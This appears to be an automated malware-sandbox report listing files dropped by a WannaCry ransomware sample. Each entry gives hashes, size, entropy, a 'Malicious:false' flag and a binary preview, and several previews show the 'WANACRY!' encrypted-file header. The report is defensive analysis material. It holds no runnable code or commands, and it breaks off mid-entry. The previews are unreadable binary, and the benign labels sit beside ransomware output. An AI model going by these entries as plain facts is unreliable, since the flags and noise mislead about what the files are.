                                                                                      MD5:46D541B24994E81C80D176EF0CD878BA
                                                                                      SHA1:7AC25DDD97F078340DFEABF6906054936858BD78
                                                                                      SHA-256:B949247D819932445AE5B4B44809369C2612742EFB7DD4B0A229C453BEB2A7FF
                                                                                      SHA-512:75D66994AB5CC77489EA93A8397AA4D3AE2C5ABAC84D9793BD71DA0AB4A525F89D37B2ED694C23DE935B5E2F36DC11691326B52E77E02F21B29C95E58CD37E9D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..E{m*H.........t9..].79.|&.....G}0q...{M.U.%.2.xZ/...>.W.....H...1..J{[EL[...H.>.<..9C,...W.Ao..[.k..-....yK..r......j..'B..CN.c.d't..^.b.SS...........l`.3z.EH.A.....Ts^..9...^.q.3$.p.P..f@.....c..EbV..F.."......j...%.p...aS.......&i.*vhU..z.T..^..k...\.........Kdh.U$xZ.UQ.U.,.....A,.rF{.HXbK.(2..3ol[....8...g.".E.;vr.......yp..."*.T..a.....K..<..^..5\.}g4.]]<d....DG*.Ks;t....2ws.+|...>.N.......@H...f..g.&.hR..o...p... /...A...0@).au...X.4:t..Z]..$....{.}...18.jN..2...D..B.O..A...^s..*..1=....uS....9.L..c.d}:>Hy....%k...h-R.@.I"..)mrip.h#. .......|.5.t..........TB.<;..oR..P<e..Rw.l....k....K.*.....1.?D.^.Xi...#2..........[..... ....S...o.F.3.Sk.<...zn./.. .@I.R..t....z.].......!.k..i...}.z.......&+.d-.......fPg&...Z......I7...C<[._.....7...AUM.....>..!.:.F6:.}i.."H...3.^...Jjl....'...ZW.......)C.G...i..{... a.]....*.Q.......i.?.y....V.h.0S_.B+.9.&...%..k../..X..oq........,..4&R....N..6J....]....8.uT..HM..K..}y...l.W}.{...K...3.r\.b..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.857667842734363
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkLdQAbQzSYmKTcTPKvRzsPyhBzkv7HMCMEkesrvOZng6TGIIwyZ6zGNNuh:bkaVXmKQbKcHJ5acpyLwyZ6Dh
                                                                                      MD5:B6A68D87913195C4848D4444FC89CE18
                                                                                      SHA1:DBBCBA9322DEAB0E5785B24DC0DFBD3D2D8B655B
                                                                                      SHA-256:7AD3357FF89421A07056D622C16CFD7133331FB9A603C50BA771E1D5528DCF27
                                                                                      SHA-512:E517CF096D21D8998088E6E570C48972E638C7216B17339E44665560355CAF9738124E4712089652992C701A576C5BDD1CB0C7B3C2056B0E58B9D9486CC44C1A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......;M.B.W.S?......&...pd[g.,...Z..8...-..t...b.m.cJR...Tv..K..)...lG?...W.>......o.....95.......Y..A..fH$%...Ou=.....'bH.9.....\g..q...'......L...H.=.R.jV.PH...ox_.-.....(*..`XjV;>....O...u.R.T.:..SO.s.%.....84...Z...{.4X{y.^A7..b_0.../F.}............|..v..a.R._...._.|4T)..:~Qom....+X.s....'!.WJk..*...j+P....W.m.J'"9.kFA..k.s..U.[w..G6..q..i[.....Z[T%...V....dJ .Z.....|M...|mD.1.&.h..M.?...Z....S..Z.3n....n.\..k.-.}(:.;..PP.....+.[......2N...^".F.0....|..........`bt......0.p9)...B.V........^.r...i..k:q_k..qN,.iyh."..w.|].m..@.a+..3%!9.ubj...Ju...D!....UhB.[{.U....u...cksR.......5@..6.I%`..a....m5K..'...Q.!.._.VdH.{.....P=.0.E..|....h0...z?j3...F..J.....R]..]g_8..s.)*\.)......c..p.V.}.*..W...K....1............"....|.De...`c.^...h..L#..hP..+dD.x".h.P.B...c..gH.......3....,.B..f......}...FUh..I.P..J.lK.-9b.@..Q.yF...?<%DM..R....L...6dH@..a...w...0..L...C....#6.B...5......:-.^u........]......._..L..4\..]S'.$D}.T....:3R.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.857667842734363
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkLdQAbQzSYmKTcTPKvRzsPyhBzkv7HMCMEkesrvOZng6TGIIwyZ6zGNNuh:bkaVXmKQbKcHJ5acpyLwyZ6Dh
                                                                                      MD5:B6A68D87913195C4848D4444FC89CE18
                                                                                      SHA1:DBBCBA9322DEAB0E5785B24DC0DFBD3D2D8B655B
                                                                                      SHA-256:7AD3357FF89421A07056D622C16CFD7133331FB9A603C50BA771E1D5528DCF27
                                                                                      SHA-512:E517CF096D21D8998088E6E570C48972E638C7216B17339E44665560355CAF9738124E4712089652992C701A576C5BDD1CB0C7B3C2056B0E58B9D9486CC44C1A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......;M.B.W.S?......&...pd[g.,...Z..8...-..t...b.m.cJR...Tv..K..)...lG?...W.>......o.....95.......Y..A..fH$%...Ou=.....'bH.9.....\g..q...'......L...H.=.R.jV.PH...ox_.-.....(*..`XjV;>....O...u.R.T.:..SO.s.%.....84...Z...{.4X{y.^A7..b_0.../F.}............|..v..a.R._...._.|4T)..:~Qom....+X.s....'!.WJk..*...j+P....W.m.J'"9.kFA..k.s..U.[w..G6..q..i[.....Z[T%...V....dJ .Z.....|M...|mD.1.&.h..M.?...Z....S..Z.3n....n.\..k.-.}(:.;..PP.....+.[......2N...^".F.0....|..........`bt......0.p9)...B.V........^.r...i..k:q_k..qN,.iyh."..w.|].m..@.a+..3%!9.ubj...Ju...D!....UhB.[{.U....u...cksR.......5@..6.I%`..a....m5K..'...Q.!.._.VdH.{.....P=.0.E..|....h0...z?j3...F..J.....R]..]g_8..s.)*\.)......c..p.V.}.*..W...K....1............"....|.De...`c.^...h..L#..hP..+dD.x".h.P.B...c..gH.......3....,.B..f......}...FUh..I.P..J.lK.-9b.@..Q.yF...?<%DM..R....L...6dH@..a...w...0..L...C....#6.B...5......:-.^u........]......._..L..4\..]S'.$D}.T....:3R.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.800781535101533
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:eFWcetJSk1s0q0RN0W6ePGBH80MvZPHsgQHM7cimijATj:eFWc6JSCs0ZL6ZHC3nmi0v
                                                                                      MD5:4FFB44CCAA0C22C95C80EC1A32B13FC5
                                                                                      SHA1:B54C96CC4CB2FBA05A6B6158E8582DAB51ABA2DA
                                                                                      SHA-256:E5E66D262329B276B06FCC7021098BEE7609C92698893C926DB035387C222E2F
                                                                                      SHA-512:6D0E5664890F139554CCDC371C1ED36B40929DDEDBA06CFFC04973419D0E74F615E3DD20A6D0A243C834EB21067C6E60504862B94525EEBA529EE2E1CDD174B7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...j..i.u;...O.=?.....ZV....T'>..GY.d..Z.Hj.z+..oo.VD.d..o..p.=Pu...c9l........'...2O...Jtv..y.&..n.}.d..9..t]..FR.x>HM....&...3.Bx....c.e.Df.Y....Y.u....O.g.f).TP.....JBIv.Pe..:-h.\]-E.[-.....h.CO.....n!...C..0..p)..|Y#..HN...X.....-...j..,.|.N.]...((.`.7....eaN....**tR~..,B..6.Z.......6).A.c...t\p..X.D....-..1.|h.a..:=7.Kr..r\.G...LM=x+.`..F..K.vE.........N./....&...4\._}.5.......u..7f....-G.C.....=E+.n.Z...U+.....q........J,z:wc...<.Q...8M....t..`m.."-.L(d7.(.*o;H..%{^..]r&nER..X.E5...xh.....umL$.Er...X.Z..iEo.k.=...5.@.G..:w......A@g.R...#..W....-........d.......&..h..9.*...v.....o'.."L.9..m.y.x@M......Al....G...E....9..(_...T...nO.q.wxS.L....Y[f4..4....LW.w.n.>...\..3....*..3f....f.S.ZK,(...`.$.......I....@....i....yB..dG`..+..v.g.;XA.Q'...."nU....T.;i...4..[.:3....&...J]4...9]...[B]q....4...,....umG<...Ex.c...n.;..pG$..c....T,v....3d^....".twU...)..t:*..%.U...[.e].d.h.Fx......s._...^...5....!.rg<.(.hm_....>. ;....%m*...eFW...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.823676017949698
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkn3w51nAtem7lPR/RnQmTV0qxCXoHiWXtYh2s6ydelRIA/fw03wPiZnePqobcQ7:bk3m1nQt7n/NQ0Sq4YpY11YCo40gkeQc
                                                                                      MD5:9713BFD66650F2BCF526BB24A3939944
                                                                                      SHA1:4FC8A02CBCBDE1D3FBA1B08DDBB67308B82D2B23
                                                                                      SHA-256:DDE343DAD51EB5F0160830054A20C7EA55F9801F206443D9975ACC75E53B3741
                                                                                      SHA-512:163B9CDC30E9DCD06C7F6CD1277E7E682E2DF5DD77AF02E55EDDE23BCA771CAC32BD63CE215A188E16E9964B6214A7268450CE9E6BC2741FD06035EBF48A56DD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......1'.%.M.b...%8f...........cQ3....m.B..j...P.....l..........w..$.r.r.............."O......~". .....Z~.....N.."......v$....WO..8.G!./.3...P.W...&....[.4.!.PW.}.p..>G@....B..E..&.G.+.C.9?q....*..3c...f".k.z.V....X..L..&.^t..4Pu9#.*.<.,.~{...............~R<Y....c.^.....u.?..DCyzrz.9).42.;.{Qi.......;.Zo....%d.N;...c.....R..H.A(...n]..ah..}.X..[.S..[..I...)f.^.6...0.Y.u............~.m.B%.Z..X.s....'.X*.p..5......q.....gB..c^..U.*..3.........6Y...%V65.m.nK..e<x .`.k(Z...(C0`<Flr.E6....O.e..._.]...A.M....l......_..........zg.T..........j...e.....y..DO.i..v...~..1..R..D.Mre>.;..c.o2."...jr.......t.".t1X.8XD..0...k....^..."....H.Z.j....u..j......0'.......V..Z..t5"R...m..m.YO...8b..D.2..?.O.+....O.... ..:....k..v.@.u.xnl..h=;@.[H..{s.{..9u#P..4...8..%m.S.../...8.K7..M..u.ru..vL.i%W...Zv.f...C..z.2D..8...E.p...../..x.v...^.....r........O....rm'.h.*HHB<..1.....L...w..|..D.[..D.nTG....r.[{..p.y.*..B.Ty.Y.^flx.\e.EY..nU^*.vcR...[/.yg..[
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.823676017949698
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkn3w51nAtem7lPR/RnQmTV0qxCXoHiWXtYh2s6ydelRIA/fw03wPiZnePqobcQ7:bk3m1nQt7n/NQ0Sq4YpY11YCo40gkeQc
                                                                                      MD5:9713BFD66650F2BCF526BB24A3939944
                                                                                      SHA1:4FC8A02CBCBDE1D3FBA1B08DDBB67308B82D2B23
                                                                                      SHA-256:DDE343DAD51EB5F0160830054A20C7EA55F9801F206443D9975ACC75E53B3741
                                                                                      SHA-512:163B9CDC30E9DCD06C7F6CD1277E7E682E2DF5DD77AF02E55EDDE23BCA771CAC32BD63CE215A188E16E9964B6214A7268450CE9E6BC2741FD06035EBF48A56DD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......1'.%.M.b...%8f...........cQ3....m.B..j...P.....l..........w..$.r.r.............."O......~". .....Z~.....N.."......v$....WO..8.G!./.3...P.W...&....[.4.!.PW.}.p..>G@....B..E..&.G.+.C.9?q....*..3c...f".k.z.V....X..L..&.^t..4Pu9#.*.<.,.~{...............~R<Y....c.^.....u.?..DCyzrz.9).42.;.{Qi.......;.Zo....%d.N;...c.....R..H.A(...n]..ah..}.X..[.S..[..I...)f.^.6...0.Y.u............~.m.B%.Z..X.s....'.X*.p..5......q.....gB..c^..U.*..3.........6Y...%V65.m.nK..e<x .`.k(Z...(C0`<Flr.E6....O.e..._.]...A.M....l......_..........zg.T..........j...e.....y..DO.i..v...~..1..R..D.Mre>.;..c.o2."...jr.......t.".t1X.8XD..0...k....^..."....H.Z.j....u..j......0'.......V..Z..t5"R...m..m.YO...8b..D.2..?.O.+....O.... ..:....k..v.@.u.xnl..h=;@.[H..{s.{..9u#P..4...8..%m.S.../...8.K7..M..u.ru..vL.i%W...Zv.f...C..z.2D..8...E.p...../..x.v...^.....r........O....rm'.h.*HHB<..1.....L...w..|..D.[..D.nTG....r.[{..p.y.*..B.Ty.Y.^flx.\e.EY..nU^*.vcR...[/.yg..[
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.794708491395063
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:QHZC9SF2u1tXoscP9nGjfsw5MMhVmPX6vvvS/V9gKzlcDAn4:Qt4s+9nGj0w5McVmPX6vvvVYwA4
                                                                                      MD5:42CF0638CCF84C66A393B085D2CA2814
                                                                                      SHA1:85282F50661FACF1677B6FE4E198B52503A1B8E6
                                                                                      SHA-256:5BB95DE08EDE444EA5DC1CBCCDA1BA77E6615D8286172B457DD1015C3C8DB854
                                                                                      SHA-512:7FCD9B99811C2808374C6A27FDF86EB43BDCE58E3B71AE7A44FF179E00DB2C3834C6E0FB2BC2A87971340F9FBB28F526088857DE62B8CDAF0DBECA9328561043
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:~.....e!Vb......<}c...d..d...d...iK...%.}_....WI$..5..Tib..LR...Me...-..bCE.....b|.V....$...r.}pW.^Pm..A....M..[..Y.1..7V.A.F9A..i.}.Y..1........Q1.q.b.......+r9..(..4.9d&..T.+,.o..U......x.$.^....H|...Y..8.xb....N...t...yP...........Z.y....".^......"...~.T(XXx.~...oVC. .8*r..%.m.d.e/EW_...Z].%..T.u<.......c.....I..+.6.|DDQ.o..@...#......y]-..t.....a..ctS.]h..K.e}.6.......!v....".M~g.G.AD<.S..d.V..J..1e].r..C.f..Kb.#...D.^Xzi.a V...0...W>2..}.1"..|....p..H....|....<rh>o[]N/..ulb.q.|......BE.&$....`..*...}.WlB.......J..[.....p......d..T.\..n..|..2y..F.i.......0".?..W&.."'...tZ.G..X... 8.8....6.3..f- A...4.....!.KA..4.L.x.)&_[??...&....!.....`.~..v*...}\V.&....1.`h...6(.I.../.......R.T......i.....uI....dkr+3.L.j.w[.>.u9.[S....&F..,..ui..:z. ..T.(.CP&...}..j|l.:....P4S.l.......W....[d...[.S..}.|.!.OL!SI.h...M..V........Y.%>....0.c.3./...5.......vo..0..=.E..-.L.....Z|..:...a...|._.2.$...{C.....{i.tH.5...._oL}5.....]..CPJ......S.f.....q......|.'&.gN
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.827525705276596
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkSbTmHNAevqPcOmdp5E6cXWPNAHlIjdpCdj9YFjjAASwNVMRC6H/RU85+MGHzy6:bkSbTC97d7EFXmNdjdpCdBYFjcqVzEij
                                                                                      MD5:E6BC13D0D4B29575F7564E795C435A93
                                                                                      SHA1:89984BD3633B5819C02B7188CEB341CE8E577736
                                                                                      SHA-256:D55E8B21D1F036E60F342E360E124E70518B101E87198031B77F1BF41E60615E
                                                                                      SHA-512:0F7B6D57133238EE3B800DAC3349CC17AB4C9A546BC581E91EED3756261FD77817DE383FF1E28A4ED13786C0E98B27AB9565A3F132F18A17531D8E832833BC40
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....B....?&a...}.o...p...fVL.s.e..P......D..z..wq0c.q...D.2.\..h...o.@w.`..R;D.x.o....h..a.....y.W$/..k.,_...,m:G>.xr...3m..>.D......K...=F...aTY.....=.fI.S...::...I....^...M.h..oS..Kj..%o...*]0..w..T....^.)@.=&..e[&....q#G........MR......b.8..$....................te.ju.uH_...N*..i]*.?W..1. .-.*. >.u..L8.e.E.........%4(_,+.u.#...R1Nh....1..;.."JJw..E.Z..:r.K].$..h..3\UA.KP....R...z...@....:_..>.-.<#....z.=M29dbg..G...H...v9A..N...-.L...-.V.#..G..)]..J.M.qTr........^.#.l..4...$.MtT....g.6.4.......)..'v...m....&X.q.[.8..Q.!qmD...=.#.r.{.K..9\...U.Y.o.-..[..oC.".M.i...|S.....O...M.ZQ.....[$..#.F.\.Y..*..c*...dLm8.m..H.....y.........!... E\.....Q.A.V..x..a.G#C.....F.s,.....al.):.mLW.'4.+0m3......{(...nn.z......6j....Y(...B.e...?.3.A..*..N.h.D.....>..............so...b....Q.zK...5.c..S.....AV..\..3..V......,.nZ......8........X-.#Muj.SJ....#Y..a>.nU......4n$e..IyD.T.=..Q........4*..Q?..o*...K.M.Z....u.......6..V.....d$...s...y.../..4.v..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.827525705276596
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkSbTmHNAevqPcOmdp5E6cXWPNAHlIjdpCdj9YFjjAASwNVMRC6H/RU85+MGHzy6:bkSbTC97d7EFXmNdjdpCdBYFjcqVzEij
                                                                                      MD5:E6BC13D0D4B29575F7564E795C435A93
                                                                                      SHA1:89984BD3633B5819C02B7188CEB341CE8E577736
                                                                                      SHA-256:D55E8B21D1F036E60F342E360E124E70518B101E87198031B77F1BF41E60615E
                                                                                      SHA-512:0F7B6D57133238EE3B800DAC3349CC17AB4C9A546BC581E91EED3756261FD77817DE383FF1E28A4ED13786C0E98B27AB9565A3F132F18A17531D8E832833BC40
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....B....?&a...}.o...p...fVL.s.e..P......D..z..wq0c.q...D.2.\..h...o.@w.`..R;D.x.o....h..a.....y.W$/..k.,_...,m:G>.xr...3m..>.D......K...=F...aTY.....=.fI.S...::...I....^...M.h..oS..Kj..%o...*]0..w..T....^.)@.=&..e[&....q#G........MR......b.8..$....................te.ju.uH_...N*..i]*.?W..1. .-.*. >.u..L8.e.E.........%4(_,+.u.#...R1Nh....1..;.."JJw..E.Z..:r.K].$..h..3\UA.KP....R...z...@....:_..>.-.<#....z.=M29dbg..G...H...v9A..N...-.L...-.V.#..G..)]..J.M.qTr........^.#.l..4...$.MtT....g.6.4.......)..'v...m....&X.q.[.8..Q.!qmD...=.#.r.{.K..9\...U.Y.o.-..[..oC.".M.i...|S.....O...M.ZQ.....[$..#.F.\.Y..*..c*...dLm8.m..H.....y.........!... E\.....Q.A.V..x..a.G#C.....F.s,.....al.):.mLW.'4.+0m3......{(...nn.z......6j....Y(...B.e...?.3.A..*..N.h.D.....>..............so...b....Q.zK...5.c..S.....AV..\..3..V......,.nZ......8........X-.#Muj.SJ....#Y..a>.nU......4n$e..IyD.T.=..Q........4*..Q?..o*...K.M.Z....u.......6..V.....d$...s...y.../..4.v..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.815106126808348
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ovD1VCF3HJoaDmFJCYHXyqcao0rWZw2w7eqlo5yO1hYDcyykS3bCN:ob63e7FZiqcao06coYDcytS3bCN
                                                                                      MD5:D32308D4C74D85D8EE56339006595698
                                                                                      SHA1:7E2F4BC2FA648CD6BA44FA1E1AABE5B751D21514
                                                                                      SHA-256:5BC5A2F47F232879509E06E44658CFD99AA2FE0E78BC03A05AB45BB033ADEF8A
                                                                                      SHA-512:74173750ADBA49BBC9635E38DA88EF8F7610689A10CF616AE9A7BC87269679DA16B147660E95330C49100E8A0CF57ADA920791E5B0725CABE0491689F86D42CC
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:|.E..%r.pb.T.^o.X?.e........(Q....)AuG..=Y..f..F.%.O..B.V.tQ..t1FT.S.~.X.X!C.&K.=fZ.h.[...4..]...A=.Yj.3*....6[,.[F...N. '[.0.@.e.).iiC..5Cp.Tj33.h.Z. A....&.a....3$sl.......L...Ra.fZ...6M#......M..t........Q..S...:.Y.U %...."`,...M.../.C:F.z..T6. ..r..f..<. ........o;z...0...N......s.1.........Xb`....4..6$A"..,*............t.........^\.A..6g"{.c..iz.a..u7'=.(rL.:...[.EC.%Z"=....5.(A.P.R........&.Q.._$Z|......b..h......w9.......m/S..@..^\vnP..{......48w#_...,............0[....T.2.p..u...ov`.....Uk..$.m.M..b.k.@.IP\.._yrk......|i.....Q......>..!.O}.[)............,og5'Y....4x+....v.0.\..M....V..A.U.Y.z&.7O...4..4:.......... ...*.. J3...?h.}.t...e].q.-{.....d{.sV..xN.._N].v...57.Z.....>".4I..y.^....J..Lm.1..l...:Z.A.{&Y....u..eJKVM.9?X...{..Y./o..P.P/...0..^V.. .y3.)I.9.A.......=`i...0...M6......N#Z.G.H&DL...L..,>E-.iC.O.].w[..G.~=D.I.4e.|.....v0R.[$<....x.....W...=...h....>...^.....0p...f.!..Y.^a.P;.)T.%..f.(.'xB.b.4....Z.l.....R]XN+.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.845355915148894
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkwcytpYaQPZpFK2CniUHiz3y3vFrQXAa43qrIuWXjTlamxPx+f8j7KZlZsU8:bkw70amP3yfBQXZ4Fdn0mBx+8KZsU8
                                                                                      MD5:D1CD2F6D985B0E0A169C7E6DB16F2FFA
                                                                                      SHA1:02566C39CE4ED4284CA55DC1143B1B3412313C11
                                                                                      SHA-256:49EBB13445237F6EC9A148D117550AD062367C7EF9DAE5F39207E36A136F455C
                                                                                      SHA-512:6439A10E6D33BD58EEC3390F68CDF9DD693E0E1F8DA0E6D34B03FB0CB7D7098D14AFB9D2F7F2CAB2A9338AEEAB824AD9AECD199B5B37FF40B97EC76BC432FA13
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....ar'5J..^x.W.]...uG2#.i%....e2.vD";rU......[......sq..HUk.(.g.a.9..........7_zB..XO3.S....=!%3..c./..M.5....v.zS.........'.9.,....ew3.g...j6z.|.V.9?$...I.t.\..h.....Q._..x..NmQ.3tCq..seZ~. ....\6..K.I?....$.w.Dq.xW.0K..+..c.)......G.W.g.).;$)0R..............G'H.f.....G..OS...Z.........T]xg;.i...gD....T.......t..G.h..U2..}.......U.:...X.....V.)&..1V..\K..e`{.QG..+.!G.s....:9a....ga........w......;.S.W...$3.a...=t.._..C.O.-...X......1.bXV0$./.B..-.......u..(...{.>..e.@..@3....OG........%....-.6...[...J....N...1.g.pU.7.+.r.Y=y...Z....G...bv ...).j.8..P...E...?.n.N.0.8B.....~q9_JU.s.+......I.....SR......,i..c.D.\.....A.....%.=.S:.3..g...a.[;.(C..Z.C...U.N.h......o<.j....j...e`.s#L.PW.. o..@..Me.........".~..p#;2..O...|Z....H...+.RM.i.v..iS.z.zLD.c....u.pZ.&...{,r.'.........&....v.a.nzyk...F:.!.#..\.u...<..)$..$.c*..x.....K7..v/..B.b..Z..:.s.j.<..o..QC.......3L._.%.,....{.&,...7s%Z.x......../J.~.zG....m.[...oH..=....*.3.I.4...-
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.845355915148894
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkwcytpYaQPZpFK2CniUHiz3y3vFrQXAa43qrIuWXjTlamxPx+f8j7KZlZsU8:bkw70amP3yfBQXZ4Fdn0mBx+8KZsU8
                                                                                      MD5:D1CD2F6D985B0E0A169C7E6DB16F2FFA
                                                                                      SHA1:02566C39CE4ED4284CA55DC1143B1B3412313C11
                                                                                      SHA-256:49EBB13445237F6EC9A148D117550AD062367C7EF9DAE5F39207E36A136F455C
                                                                                      SHA-512:6439A10E6D33BD58EEC3390F68CDF9DD693E0E1F8DA0E6D34B03FB0CB7D7098D14AFB9D2F7F2CAB2A9338AEEAB824AD9AECD199B5B37FF40B97EC76BC432FA13
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....ar'5J..^x.W.]...uG2#.i%....e2.vD";rU......[......sq..HUk.(.g.a.9..........7_zB..XO3.S....=!%3..c./..M.5....v.zS.........'.9.,....ew3.g...j6z.|.V.9?$...I.t.\..h.....Q._..x..NmQ.3tCq..seZ~. ....\6..K.I?....$.w.Dq.xW.0K..+..c.)......G.W.g.).;$)0R..............G'H.f.....G..OS...Z.........T]xg;.i...gD....T.......t..G.h..U2..}.......U.:...X.....V.)&..1V..\K..e`{.QG..+.!G.s....:9a....ga........w......;.S.W...$3.a...=t.._..C.O.-...X......1.bXV0$./.B..-.......u..(...{.>..e.@..@3....OG........%....-.6...[...J....N...1.g.pU.7.+.r.Y=y...Z....G...bv ...).j.8..P...E...?.n.N.0.8B.....~q9_JU.s.+......I.....SR......,i..c.D.\.....A.....%.=.S:.3..g...a.[;.(C..Z.C...U.N.h......o<.j....j...e`.s#L.PW.. o..@..Me.........".~..p#;2..O...|Z....H...+.RM.i.v..iS.z.zLD.c....u.pZ.&...{,r.'.........&....v.a.nzyk...F:.!.#..\.u...<..)$..$.c*..x.....K7..v/..B.b..Z..:.s.j.<..o..QC.......3L._.%.,....{.&,...7s%Z.x......../J.~.zG....m.[...oH..=....*.3.I.4...-
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.78800029283677
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:VOHrH7LjpziUHbwMxfHFEyno2OSs1FnJM8eFWQEdJfYSiKI:VyrHNzh7Hpq3pVleN
                                                                                      MD5:C1DAA06BDE65465D1FA684CA53D0089F
                                                                                      SHA1:5DDF1CEA213FCD7D10CB72EEB2D88A376D257FA7
                                                                                      SHA-256:7BC97FEDE9A71C5C84953D41DD858152AEC9C4C875BE5C820D46E676FBB1DDEB
                                                                                      SHA-512:2FBC69D394EE3770A87F407CFFCD2E43870249ED695B9CAD7E1E23CDC46898DD93C47EDCEA3177FE60E4FBCD26C68B1BBDBDFF0ECC9A2167A502FC70123B5FE2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:....A.....Y_.%...C....!{&..O*.v.........7..I.%B.@xD.u.p...u-...'.............7...U.f.CW....f.....IKq.jS.G.o (....`..%J*{.(...=..@n....D..{...K.Z..1..E.'...Z:.v...F.65Ox...h.\Y...$..k.......6..9x........*..g\E..X...0.uP...%h...6.V...<.C.. .b..c.^,+....%.;.A|%.....mS............0.......M.~......2Lm.l~..>..T..A.K...qCF..=..s"..n.x.A...|... .R.o/!BAm`/g.....C8........dR..,.B.u.>..F......K.X.%..[]SI....P........(....v+}~...Z=.5.E.<...x.....t......".(p...oFz...M.1s..O..^..........a.*..h...Zd..vd......iq+..J..;.<'.?p.\../,\...2g.?w..{..v..Q..s.M6.....;....`.>...L....W..['UT&&i_.'.I|....Q.?=.=.C.7..t."O..A"F.j.vX.0..?.@=.7.<..\f.....i...2.2......._X...LxVDv.ZL..GG.m.E.:.P.....h..p-.w8...Ni ..s.F.W../...s.|.J.v.w...Z ...y#.....W#h.s>![+....0..V....Jw..../....=..e.&0......4}...C.h.Y..._...... )......Nfc4x~.z..m....7P.{......a...!m...q.L...!}.N......k....c.,d+.nQlu.!d..4......[.....tZK..,#.[...R.?../.ddq....]......NT.!.^............SY.F3..q.E..^;4...m
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
